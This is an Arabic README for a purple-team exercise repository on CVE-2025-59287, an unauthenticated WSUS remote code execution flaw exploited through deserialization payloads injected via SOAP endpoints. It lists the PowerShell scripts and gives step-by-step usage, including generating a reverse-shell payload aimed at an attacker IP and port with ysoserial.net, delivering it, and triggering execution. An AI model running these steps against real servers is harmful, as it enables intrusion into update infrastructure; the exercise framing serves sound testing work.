
سكربتات تمرين الفريق الأرجواني التي توضح CVE-2025-59287، وهي RCE غير مصادق عليها في WSUS عبر حقن حمولة إلغاء تسلسل خبيثة في قاعدة بيانات WSUS.
نصوص برمجية لتمارين الفريق الأرجواني لـ CVE-2025-59287، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في خدمات تحديث Windows Server (WSUS).
للاستخدام المصرح به فقط. للاستخدام في بيئات تمارين خاضعة للتحكم ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.
تستغل الثغرة نقاط نهاية SOAP الخاصة بـ WSUS القابلة للوصول بشكل مجهول لحقن حمولة إلغاء تسلسل خبيثة في قاعدة بيانات WSUS. يتم تنفيذ الحمولة عند فتح وحدة تحكم إدارة WSUS أو عند تشغيل مزامنة.
8530ysoserial\Release\ (انظر الإعداد)wsus-cve-2025-59287/
├── 1-check.ps1 # Verify target is vulnerable
├── 2-generate.ps1 # Generate serialized payload blob
├── 3-deliver.ps1 # Deliver payload to WSUS server
├── 4-verify.ps1 # Verify execution and clean up
├── ysoserial/ # Place ysoserial.net release here (not committed)
│ └── Release/
│ └── ysoserial.exe
└── README.md
قم باستنساخ المستودع أو تنزيله. أضف ysoserial.net بحيث يطابق المسار ysoserial\Release\ysoserial.exe.
قم بتنزيل ysoserial.net من: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 سيؤدي هذا إلى تشغيل Windows Defender افتراضيًا
قم بتشغيل جميع النصوص البرمجية من جذر المستودع.
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"
إسقاط ملف (لا حاجة لمستمع، موصى به أولًا):
.\2-generate.ps1 -Mode filedrop
قشرة عكسية:
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"
على خادم WSUS افتح وحدة التحكم الإدارية عبر Start > Windows Server Update Services، أو قم بتشغيل مزامنة عبر PowerShell:
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
التحقق من التنفيذ:
.\4-verify.ps1
التحقق وتنظيف جميع القطع الأثرية:
.\4-verify.ps1 -Cleanup
من جهاز الهجوم عبر مشاركة إدارية:
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup
بعد التنظيف، قم بإزالة جهاز التمرين من وحدة تحكم WSUS ضمن Computers.